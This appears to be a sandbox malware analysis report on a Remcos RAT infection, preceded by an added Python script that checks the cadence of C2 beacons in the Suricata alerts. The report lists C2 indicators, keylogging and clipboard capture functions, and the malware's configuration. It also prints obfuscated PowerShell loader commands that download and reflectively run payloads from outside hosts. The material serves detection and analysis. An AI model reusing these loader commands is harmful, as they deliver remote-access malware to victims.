2024-09-25T18:54:03.773321+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49722 | 45.134.140.70 | 50312 | TCP
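The eleven SID 2036594 rows are one TCP connection each from the sandbox host to 45.134.140.70:50312, the port named in the extracted Remcos configuration (ramcxx.duckdns.org:50312), and each uses a fresh source port. The cadence check below is an added example written for this page, not part of the Joe Sandbox report and not Suricata code. It parses the alert rows exactly as listed above (the two exploit-kit rows included, so the SID filter does something), computes the interval between consecutive connections for one SID, and judges regularity with median and median absolute deviation rather than mean and standard deviation, so that the single 45 s gap before the second connection cannot hide the steady beat of roughly 22.4 s. The 0.1 MAD-to-median threshold is a working assumption, not a value taken from the report.

```python
"""Beacon-cadence check over the Suricata C2 alerts listed in this report.

Added example for this page, not Joe Sandbox or Suricata code. The rows are
copied from the alert table above; the 0.1 MAD/median threshold is assumed.
"""
from datetime import datetime
from statistics import median

# Pipe-separated rows as in the table: timestamp, SID, severity, classtype,
# source IP, source port, destination IP, destination port, protocol.
ALERTS = """\
2024-09-25T18:50:19.290790+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 104.168.32.148 | 80 | 192.168.2.5 | 49708 | TCP
2024-09-25T18:50:19.290790+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 104.168.32.148 | 80 | 192.168.2.5 | 49708 | TCP
2024-09-25T18:49:56.463614+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:50:41.546804+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:03.935894+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49713 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:26.329688+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49715 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:48.885817+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:11.300191+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:33.741698+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:56.235749+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49719 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:53:18.658908+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49720 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:53:41.236809+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:54:03.773321+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49722 | 45.134.140.70 | 50312 | TCP
"""


def parse_alerts(text):
    """Turn the table rows into dicts with aware datetimes and integer ports."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, cls, sip, sport, dip, dport, proto = [f.strip() for f in line.split("|")]
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "severity": int(sev), "classtype": cls,
            "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto,
        })
    return rows


def beacon_profile(rows, sid=2036594, max_mad_ratio=0.1):
    """Inter-connection timing for one SID. Median and median absolute
    deviation are used instead of mean/stddev so a single long gap (a retry,
    a first-contact delay) cannot mask an otherwise fixed cadence."""
    hits = sorted((r for r in rows if r["sid"] == sid), key=lambda r: r["ts"])
    if len(hits) < 3:
        return {"connections": len(hits), "periodic": False}
    deltas = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
    med = median(deltas)
    mad = median(abs(d - med) for d in deltas)
    dst = hits[0]["dst"]
    return {
        "destination": f"{dst[0]}:{dst[1]}",
        "connections": len(hits),
        "distinct_src_ports": len({r["src"][1] for r in hits}),
        "median_interval_s": med,
        "mad_s": mad,
        "max_interval_s": max(deltas),
        "periodic": mad / med <= max_mad_ratio,
    }


if __name__ == "__main__":
    for key, value in beacon_profile(parse_alerts(ALERTS)).items():
        print(f"{key}: {value}")
```

On these rows the median interval is about 22.47 s with a median absolute deviation of about 0.07 s, the longest gap is the 45.08 s before the second connection, and all eleven connections come from distinct source ports. The same profile computed over the 2020423 rows reports a single hit and no periodicity, which is the expected answer for a one-off download.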


                      AV Detection

Source: http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF | Avira URL Cloud: Label: malware
Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | Avira URL Cloud: Label: malware
Source: ramcxx.duckdns.org | Avira URL Cloud: Label: malware
Source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: LJ1IZDkHyE.hta | ReversingLabs: Detection: 26%
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004338C8
Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_6e2816b5-4

                      Exploits

Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR

                      Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407538 _wcslen,CoGetObject,11_2_00407538
Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: Binary string: TenantRestrictions\PayloaddConnRouteHelper.dllrfrvbpim.pdb source: powershell.exe, 00000003.00000002.2175384475.0000000007B40000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.pdb source: powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2

                      Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                      Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49713 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49715 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49718 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49720 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49717 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49711 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49722 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49716 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49719 -> 45.134.140.70:50312
Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 104.168.32.148:80 -> 192.168.2.5:49708
Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 104.168.32.148:80 -> 192.168.2.5:49708
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49723 -> 45.134.140.70:50312
Source: Malware configuration extractor | URLs: ramcxx.duckdns.org
Source: global traffic | TCP traffic: 45.134.140.70 ports 0,1,2,3,5,50312
Source: unknown | DNS query: name: ramcxx.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.5:49711 -> 45.134.140.70:50312
Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 | Host: ia600100.us.archive.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1 | Host: 104.168.32.148 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 207.241.227.240
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | ASN Name: INETLTDTR
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /345/nicemeetingsofpictureclearthingstobe.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 104.168.32.148 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.148 (50 identical entries in the report)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_03747E00 URLDownloadToFileW,3_2_03747E00
Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 | Host: ia600100.us.archive.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /345/nicemeetingsofpictureclearthingstobe.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 104.168.32.148 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1 | Host: 104.168.32.148 | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
Source: global traffic | DNS traffic detected: DNS query: ramcxx.duckdns.org
Source: powershell.exe, 00000009.00000002.2256807258.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148
Source: powershell.exe, 00000003.00000002.2177473162.0000000008B49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148/
Source: powershell.exe, 00000009.00000002.2256807258.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148/345/CHPPZA.txt
Source: powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148/345/niceme
Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF
Source: powershell.exe, 00000003.00000002.2175493809.0000000007C21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL
Source: powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2290069028.000000000318F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2253530010.0000000000F47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: RegAsm.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000009.00000002.2256807258.000000000536C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ia600100.us.archive.org
Source: powershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005155000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000009.00000002.2256807258.00000000053AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archivL
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
                      Source: powershell.exe, 00000003.00000002.2177315396.0000000008A75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/UEV/icrosoft.Uev.Commands.dll
                      Source: powershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.5:49705 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 | 11_2_0040A2F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard, | 11_2_0040B749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 11_2_004168FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 11_2_0040A41B
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CA73 SystemParametersInfoW, | 11_2_0041CA73

System Summary

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
